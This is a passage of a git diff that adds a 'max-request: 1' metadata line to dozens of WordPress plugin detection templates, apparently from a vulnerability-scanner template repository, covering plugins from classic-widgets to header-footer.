index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
